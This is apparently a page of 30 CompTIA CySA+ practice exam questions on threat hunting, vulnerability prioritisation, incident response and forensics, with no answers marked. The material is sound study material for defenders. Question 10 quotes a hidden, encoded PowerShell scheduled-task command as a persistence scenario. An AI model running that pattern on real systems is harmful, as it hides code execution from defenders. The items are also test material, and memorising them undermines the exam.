Free CompTIA Cybersecurity Analyst (CySA+) (CS0-003) Practice Questions

Sample CS0-003 Practice Questions

Browse all 30 free CompTIA Cybersecurity Analyst (CySA+) practice questions below.

1. A security analyst is reviewing SIEM alerts and notices multiple failed SSH login attempts from the same IP address to different servers over a 10-minute period. The source IP is from a known datacenter provider. Which of the following threat hunting techniques would be MOST effective to determine if this is part of a larger attack campaign?

   • Block the IP address at the firewall and continue monitoring for similar patterns
   • Query the SIEM for other activities from the same ASN (Autonomous System Number) and correlate with threat intelligence feeds
   • Implement rate limiting on SSH connections from external sources
   • Reset passwords for all accounts that received failed login attempts

2. During vulnerability scanning, a security team discovers multiple web servers running Apache 2.4.48 with CVE-2021-41773 (CVSS 7.5), which allows path traversal and remote code execution. However, the vulnerability scanner reports the systems as 'potentially vulnerable' rather than 'vulnerable'. What should the analyst do NEXT to validate this finding?

   • Perform manual validation by attempting a safe proof-of-concept path traversal request to confirm the vulnerability is exploitable
   • Mark the finding as a false positive and exclude it from future scans
   • Change the risk rating to low since the scanner was uncertain about the finding
   • Immediately patch all affected servers since the CVSS score is 7.5

3. A cybersecurity analyst is investigating anomalous network traffic and discovers encrypted outbound connections on port 443 from a database server to an IP address in a different country. The server should only communicate with internal application servers. Which combination of actions would BEST help determine if this is a command-and-control (C2) communication? (Select TWO)

   • Analyze the TLS certificate used in the connection and check if it's associated with known malicious infrastructure
   • Examine the connection timing patterns and beacon intervals for regularity that indicates automated C2 communication
   • Immediately block all outbound traffic on port 443 from the database server
   • Restore the database server from the most recent backup to remove any potential malware
   • Perform SSL/TLS decryption using a man-in-the-middle proxy to inspect the encrypted payload

4. An organization uses CVSS v3.1 for vulnerability prioritization. A vulnerability scanner identifies CVE-2024-XXXX with the following CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (Base Score: 10.0). However, the affected web application is only accessible from the internal network behind multiple layers of security controls. How should the security team adjust their remediation prioritization?

   • Focus only on the Temporal Score by checking if exploits are publicly available
   • Calculate the Environmental Score by modifying the Attack Vector to Adjacent (AV:A) and adjusting Confidentiality/Integrity/Availability Requirements based on asset criticality
   • Maintain the critical priority (10.0) since CVSS base scores should not be modified
   • Deprioritize the vulnerability to low since it's not exploitable from the internet

5. A security operations center (SOC) analyst is investigating an alert from an endpoint detection and response (EDR) tool showing that PowerShell.exe spawned from Excel.exe and executed encoded commands. The user reports opening a spreadsheet received via email. What is the MOST likely attack technique being used?

   • Malicious macro executing PowerShell for code execution or payload delivery
   • SQL injection attack targeting the user's database credentials
   • Distributed denial-of-service (DDoS) attack from the user's workstation
   • Man-in-the-middle attack intercepting email communications

6. During a vulnerability assessment, a scanner reports 147 vulnerabilities across 50 servers. The security team has limited resources and must prioritize remediation. Which of the following approaches would provide the MOST effective prioritization framework?

   • Check CISA Known Exploited Vulnerabilities (KEV) catalog and prioritize any CVEs listed there
   • Remediate vulnerabilities in order of discovery date, starting with the oldest
   • Focus only on vulnerabilities affecting internet-facing systems and ignore internal vulnerabilities
   • Prioritize based solely on CVSS base scores, patching all critical (9.0-10.0) vulnerabilities first
   • Use a risk-based approach combining CVSS scores, asset criticality, exploit availability, and compensating controls

7. A threat hunting team is analyzing netflow data and identifies a workstation making DNS queries for algorithmically-generated domain names (DGAs) at a rate of 50 queries per minute. Most queries result in NXDOMAIN responses. What does this activity MOST likely indicate?

   • Malware using a Domain Generation Algorithm (DGA) to locate command-and-control servers
   • Normal user browsing behavior with typos in domain names
   • A misconfigured DNS server causing recursive query loops
   • A DNS tunneling exfiltration attempt

8. An organization's vulnerability management program uses automated scanning, but the security team wants to improve accuracy and reduce false positives. A recent scan of a Linux server running Apache reported 23 vulnerabilities, but manual verification found only 8 were actually exploitable. Which actions would BEST improve scan accuracy? (Select TWO)

   • Switch to a different vulnerability scanner to get better results
   • Enable credentialed scanning with appropriate read-only service accounts to allow accurate version detection
   • Disable all vulnerability checks rated below CVSS 7.0 to focus on critical issues
   • Reduce scan frequency from weekly to monthly to allow more time for manual validation
   • Configure the scanner to perform safe exploit checks that validate actual exploitability

9. A security analyst is reviewing logs and discovers that an attacker successfully exploited a known vulnerability on a web server that was identified in a vulnerability scan 45 days ago but not yet patched. The vulnerability had a CVSS score of 8.1. Which phase of the vulnerability management lifecycle FAILED in this scenario?

   • Detection - the vulnerability scanner failed to identify the vulnerability
   • Assessment - the CVSS score was incorrectly calculated
   • Remediation - the identified vulnerability was not patched in a timely manner
   • Verification - the team failed to confirm the vulnerability existed

10. During threat hunting, an analyst uses the MITRE ATT&CK framework to search for evidence of persistence mechanisms. They discover a scheduled task on a Windows server configured to run 'powershell.exe -WindowStyle Hidden -EncodedCommand <base64_string>' every 12 hours. The task was created by a service account three days ago. What ATT&CK technique is MOST likely being used?

    • T1486 - Data Encrypted for Impact
    • T1071.001 - Application Layer Protocol: Web Protocols
    • T1053.005 - Scheduled Task/Job: Scheduled Task
    • T1110.001 - Brute Force: Password Guessing

11. A vulnerability scan reveals that several Windows servers are missing a critical security update (CVSS 9.8) released 60 days ago. The IT team explains that they cannot patch these servers because they run legacy ERP software certified only for specific OS configurations, and patching would violate vendor support agreements. What should the security team recommend?

    • Disable the vulnerable service until the servers can be patched
    • Accept the risk and document the decision with business justification
    • Implement compensating controls such as network segmentation, strict access controls, and enhanced monitoring while working on a long-term solution
    • Force immediate patching regardless of vendor support implications

12. A SOC analyst is investigating a SIEM alert for multiple failed login attempts followed by a successful login to a privileged account from an unusual geographic location. Which of the following data sources would provide the BEST additional context for this investigation? (Select TWO)

    • Vulnerability scan results from the authentication server
    • Network bandwidth utilization graphs for the past 24 hours
    • Firewall logs showing all traffic allowed through the perimeter
    • Threat intelligence feed showing if the source IP is associated with known malicious activity
    • User and Entity Behavior Analytics (UEBA) baseline showing normal login patterns for this account

13. An organization is implementing a vulnerability disclosure program and needs to prioritize remediation of reported vulnerabilities. A security researcher submits a report about a stored XSS vulnerability in a customer-facing web application. The researcher provides a working proof-of-concept. How should this vulnerability be prioritized?

    • Medium priority and request the researcher submit through a different channel
    • Critical priority and immediately take the application offline until patched
    • High priority because it's a stored XSS with a working exploit in a customer-facing application
    • Low priority since XSS vulnerabilities only affect the client-side browser

14. A threat hunting team is analyzing proxy logs and discovers periodic HTTPS connections to pastebin.com from a production server every 6 hours. The server hosts an internal inventory management system and should not access external websites. What is the MOST likely purpose of this activity if the server is compromised?

    • The attacker is using Pastebin for command-and-control (C2) dead drop communication
    • The inventory management software is checking for license validation
    • A software developer is backing up source code to Pastebin
    • An automated system update process downloading patches from Pastebin

15. During a vulnerability assessment, multiple findings show the same vulnerability across different systems but with varying CVSS scores due to different configurations and network locations. Which of the following CVSS metric groups accounts for these differences?

    • Base Metrics - representing the intrinsic characteristics of the vulnerability
    • Environmental Metrics - representing characteristics unique to the organization's environment
    • Temporal Metrics - representing characteristics that change over time
    • Supplemental Metrics - providing additional context beyond the base score

16. During an active ransomware incident, the incident response team has successfully isolated affected systems. What should be the NEXT step according to the incident response lifecycle?

    • Conduct detailed analysis to understand the attack scope, entry point, persistence mechanisms, and data impact before eradication
    • Contact law enforcement and wait for their investigation before proceeding
    • Begin eradication by removing malware from isolated systems and restoring from clean backups
    • Immediately restore all systems from backups to minimize downtime

17. A security analyst is preparing an incident response report for executive leadership following a data breach. Which of the following elements should be included in the executive summary? (Select TWO)

    • Business impact including number of affected customers, potential regulatory fines, and estimated financial costs
    • Raw log files showing the attacker's network activity
    • Complete list of all IP addresses, domains, and file hashes associated with the attack
    • High-level timeline of the incident from initial compromise to detection and containment
    • Detailed technical analysis of the malware's code structure and obfuscation techniques

18. During forensic analysis of a compromised Linux server, an analyst needs to collect volatile memory data before shutting down the system. Which of the following is the MOST important reason for prioritizing memory collection?

    • Legal requirements mandate memory collection before disk imaging
    • Memory forensics are easier to analyze than disk forensics
    • Memory contains running processes, network connections, encryption keys, and other data that will be lost when the system powers off
    • Memory collection is faster than disk imaging, reducing total evidence collection time

19. A company's SOC manager needs to define Key Performance Indicators (KPIs) for measuring the effectiveness of their incident response program. Which of the following metrics would be MOST valuable for this purpose? (Select TWO)

    • Mean Time to Detect (MTTD) - average time from initial compromise to detection
    • Number of security tools deployed in the environment
    • Percentage of incidents that result in executive notification
    • Total number of security alerts generated by all systems
    • Mean Time to Respond (MTTR) - average time from detection to containment

20. An organization experiences a security incident where an attacker gained access through a compromised VPN account. During the eradication phase, which of the following actions should be prioritized to prevent reinfection?

    • Install endpoint protection software on all systems
    • Reset the compromised user's password and resume normal operations
    • Disable the VPN service until the investigation is complete
    • Force password resets for all VPN users, revoke active sessions, review VPN logs for other compromised accounts, remove any persistence mechanisms, and implement MFA if not already present

21. A cybersecurity analyst needs to communicate vulnerability remediation priorities to the IT operations team who will perform the patching. The team has limited maintenance windows and needs clear guidance. What information should be prioritized in this communication?

    • A list of all CVEs with CVSS scores sorted from highest to lowest
    • Compliance audit findings with references to specific regulatory requirements
    • Complete CVE descriptions and academic research papers about exploitation techniques
    • Risk-ranked list of systems/vulnerabilities with business justification, exploitation likelihood (CISA KEV, public exploits), affected asset criticality, and recommended patch order

22. During incident recovery, a company is restoring systems from backups after a ransomware attack. Before bringing systems back online, which validation step is MOST critical to prevent reinfection?

    • Restore to new hardware to ensure clean environment
    • Test restored systems in an isolated network before production
    • Scan backup files with antivirus before restoration
    • Verify backups are from before the initial compromise date identified during investigation

23. A security team is conducting a tabletop exercise to test their incident response plan. During the exercise, they discover that the contact information for the cyber insurance provider and legal counsel is outdated. What incident response plan component needs updating?

    • Technical playbooks for malware analysis
    • Chain of custody documentation templates
    • Incident classification criteria
    • Communication plan and stakeholder contact list

24. An analyst is reporting monthly security metrics to the CISO. Last month showed 5,000 security alerts with 150 incidents (3% incident rate). This month shows 3,000 alerts with 120 incidents (4% incident rate). How should this trend be interpreted?

    • Detection quality has improved with better alert fidelity (higher true positive rate) and reduced alert volume, though incident count remained similar
    • The SOC is missing more threats because alert volume decreased
    • Security posture has degraded because there are more incidents per alert
    • No meaningful conclusion can be drawn from this data

25. During the containment phase of a security incident involving a compromised web application, which of the following actions represents SHORT-TERM containment versus LONG-TERM containment?

    • Short-term: Collecting forensic evidence. Long-term: Improving logging capabilities
    • Short-term: Notifying stakeholders. Long-term: Conducting post-incident review
    • Short-term: Installing security patches. Long-term: Monitoring for similar attacks
    • Short-term: Taking the web application completely offline. Long-term: Implementing a Web Application Firewall (WAF) rule to block the specific attack while keeping the application available

26. A company suffered a data breach affecting 50,000 customers' personally identifiable information (PII). When preparing the incident report for regulatory notification (GDPR, state breach notification laws), which information is MOST critical to include?

    • Names and resumes of the incident response team members
    • Detailed CVE numbers of all vulnerabilities on the affected systems
    • IP addresses and threat actor attribution details
    • The nature of the personal data compromised (names, SSN, financial data, health information, etc.)
    • The approximate number of affected individuals and data records

27. During forensic investigation of a compromised system, an analyst discovers that the attacker cleared Windows Event Logs to hide their activities. Which of the following alternative data sources might still contain evidence of the attack? (Select TWO)

    • Prefetch files showing recently executed programs including attacker tools
    • Temporary internet files from the user's web browser
    • Recycle Bin contents on the compromised system
    • SIEM or centralized logging system if log forwarding was configured before the attack
    • The original installation media used to deploy the operating system

28. A security manager needs to justify additional budget for security tools to executives who are concerned about costs. Which approach would be MOST effective for communicating the business value?

    • Explain that competitors have already implemented these security tools
    • Present technical specifications and feature comparisons of different security products
    • Cite recent news articles about cyber attacks affecting other companies
    • Frame security investment in business terms: potential breach costs (downtime, legal, reputation), risk reduction quantified financially, compliance requirements, and ROI from automation/efficiency gains

29. An incident response team is conducting root cause analysis after containing a phishing attack that led to credential compromise. Which analysis technique would BEST identify the underlying systemic issues that allowed the attack to succeed?

    • Document the phishing email's technical indicators and update email filtering rules
    • Create a timeline of the attacker's actions after initial compromise
    • 5 Whys analysis to trace the incident back through multiple causal layers to systemic root causes
    • Disciplinary action against the user who clicked the phishing link

30. A company's incident response plan requires different stakeholders to be notified based on incident severity. A critical severity incident (SEV-1) affecting customer data has occurred. Which stakeholders should be notified immediately according to best practices? (Select TWO)

    • Facilities management to restrict physical building access
    • Social media team to post public updates about the incident
    • Executive leadership (CEO, CISO) for business impact decisions and external communications authorization
    • All company employees to raise security awareness
    • Legal counsel for regulatory compliance, breach notification requirements, and liability assessment